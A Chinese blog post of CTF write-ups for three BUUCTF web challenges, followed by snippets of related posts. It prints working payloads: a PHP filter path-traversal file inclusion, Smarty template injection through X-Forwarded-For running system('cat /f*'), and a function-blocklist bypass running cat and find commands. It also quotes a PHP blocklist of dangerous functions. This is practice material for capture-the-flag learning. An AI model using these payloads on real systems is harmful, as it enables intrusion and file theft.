buu--web做题(3)

于 2024-07-17 21:35:08 发布
阅读量750 收藏 17
点赞数 8
文章标签: ctf web buuctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80472909/article/details/140504233
版权

目录

[BSidesCF 2020]Had a bad day

[BJDCTF2020]The mystery of ip

[网鼎杯 2020 朱雀组]phpweb

[BSidesCF 2020]Had a bad day

打开网站有两个按钮 , 随便按一个
可以看到

尝试随便输入一个参数, 发现报错有个 include() , 估计就是文件包含了

?category=pHp://FilTer/convert.base64-encode/resource=index.php
尝试读一下当前文件, 依旧报错 ,有点奇怪

将后缀去掉再试试
?category=pHp://FilTer/convert.base64-encode/resource=index
可以读出文件

截取php的代码

<?php
                $file = $_GET['category'];

                if(isset($file))
                {
                    if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
                        include ($file . '.php');
                    }
                    else{
                        echo "Sorry, we currently only support woofers and meowers.";
                    }
                }
                ?>

确实是不需要 后缀.php
读取的文件要匹配到 woofers  或者 meowers 或者 index
利用目录穿越去绕过
?category=pHp://FilTer/convert.base64-encode/resource=index/../flag
可以读到flag

[BJDCTF2020]The mystery of ip

点击一下flag , 会先出ip

查看提示:

X-Forwarded-For:

用来表示 HTTP 请求端真实 IP

抓个包看看尝试伪造一下ip, 有没有什么变化

所以问题就是这里了, 看看再这里执行一下命令

想到ssti的那种格式尝试一下

但并不是ssti

根据报错, 搜索一下可以发现是Smarty 模板

使用{if}{/if}标签执行命令

{if system("cat /f*")}{/if}

[网鼎杯 2020 朱雀组]phpweb

好像没啥东西, 抓个包看看

会有两个包

会有两个参数
一个 func 估计就是传入函数的
一个 p 估计就是参数

尝试一下system 被过滤了

读取一下当前的文件看看

过滤了很多函数

<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
    $result = call_user_func($func, $p);
    $a= gettype($result);
    if ($a == "string") {
        return $result;
    } else {return "";}
}
class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];

if ($func != null) {
    $func = strtolower($func);
    if (!in_array($func,$disable_fun)) {
        echo gettime($func, $p);
    }else {
        die("Hacker...");
    }
}
?>

可以利用那个类进行反序列化

emmmm, 没找到flag

看一下环境里面, 也没有flag

system(“find / -name flag*”)
查找有 flag名字的文件

直接读取找到的文件
cat $(find / -name flag*)

好像也可以 使用 \system 来绕过 (但我尝试的时候没成功, 没有回显)
func=\system&p=cat /tmp/flagoefiu4r93

pwfortune
关注
[网鼎杯 2020 朱雀组]phpweb 1
qq_43618536的博客
07-21 642
[网鼎杯 2020 朱雀组]phpweb 1
[网鼎杯 2020 朱雀组]phpweb 待续
zxnimud5的专栏
09-13 527
抓包看参数 联想到函数 读index.php代码 func=file_get_contents&p=index.php <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapesh...
[网鼎杯 2020 朱雀组]phpweb
qq_43801002的博客
08-02 2726
题目 buu复现 过程 1.主页面抓包,发现可以传参。执行file_get_contents。可以看到index.php的源代码。里面有一个十分严格的过滤,几乎过滤了所有危险函数。下面是一个类,里面有析构函数,可以考虑到使用反序列化构造命令执行。 <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","pro
buu做题笔记——[安洵杯 2019]easy_web
weixin_46330722的博客
11-30 1359
BUU[安洵杯 2019]easy_web [安洵杯 2019]easy_web 进入题目就是这样一个页面,先看下源码 这里有一个提示,这题应该跟md5有关,这时我注意到了URL http://60c3d800-d438-4c23-87c2-dbee32a9e363.node3.buuoj.cn/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd= 这个img参数后面应该是个编码后的文件名,然后源码里就会出现base64编码的文件内容 将img参数的值解码
buu做题笔记——[网鼎杯 2020 朱雀组]phpweb&[SWPU2019]Web1
weixin_46330722的博客
11-06 1517
BUU[网鼎杯 2020 朱雀组]phpweb [网鼎杯 2020 朱雀组]phpweb 页面看不出啥,抓个包看看。 从包中我们可以看到,传递了两个参数,func和p。func的值是date,再结合p的值,我猜测这里是用了call_user_func()来回调函数,即将func的值当作函数名,p的值当作参数。那么我们直接使用system函数查看当前目录下的文件 回显Hacker,应该是被waf拦了,用highlight_file()看一下源码 <?php $disable_fun = arr
2024年网络安全最新Buuctf-Web-[极客大挑战 2024]EasySQL 1 题解及思路总结
最新发布
2401_84264096的博客
05-03 1099
例如输入1)、1"、1-等,这些数字后面的字符不是闭合符,所以数据库会把这些输入的错误数据转换成正确的数据类型。但是,若输入的数字后面的字符恰好是闭合符,则会形成闭合。原理:当闭合字符遇到转义字符时,会被转义,那么没有闭合符的语句就不完整了,就会报错,通过报错信息我们就可以推断出闭合符。时,没有SQL语句报错,只是提示我们输入的值是不对的,因此我们可以先假设SQL语句闭合方式是单引号。分析报错信息:看\斜杠后面跟着的字符,是什么字符,它的闭合字符就是什么,若是没有,就为数字型。可知此页面与数据库产生交互。
buu做题笔记——[BJDCTF2020]ZJCTF,不过如此&CISCN2019 华北赛区 Day2 Web1]Hack World
weixin_46330722的博客
11-05 387
BUU[BJDCTF2020]ZJCTF,不过如此CISCN2019 华北赛区 Day2 Web1]Hack World [BJDCTF2020]ZJCTF,不过如此 题目源码 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<
buu easysql(真的easy吗)
qq_46485934的博客
09-26 2103
这道题让我了解到了两个东西,堆叠注入和set sql_mode=PIPES_AS_CONCAT 一.分析回显 题目为easysql,所以这道题是sql注入题没跑了。按老规矩测试, 输入1,回显 Array ( [0] => 1 ) 输入2,3, 4, 5…,回显都为 Array ( [0] => 1 ) 于是,输入0试试,无回显 心里想(???,这不会是sql盲注吧,1及1以上有回显,0则无回显) 接着我就用burpsuite fuzz了一下,基本全被过滤,and or &&amp
[网鼎杯 2020 朱雀组]phpweb1
whale_waves的博客
12-04 798
call_user_func函数类似于一种特别的调用函数的方法,它可以调用php内部函数也可以调用用户自定定义的函数。这里我的思路是通过反序列化传入参数绕过网站对func的防护,通过反序列化后执行system函数。call_user_func()这里似乎是利用的这个函数然后执行用户输入的然后去调用内部函数。####这里其实可以通过一个php的特性绕过直接执行命令,但是还是先按着作者的想法来做。随便输了几个函数,他这里就报出了call_user_func()func传输函数,而p则是传输参数的内容。
【网鼎杯 2020 朱雀组】phpweb
gmp的博客
06-08 1150
访问题目: 打开是一个获取时间的页面 查看网页源代码: 也并没有什么有用的,抓包分析: 试着改参数,读取代码:func=file_get_contents&p=index.php <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值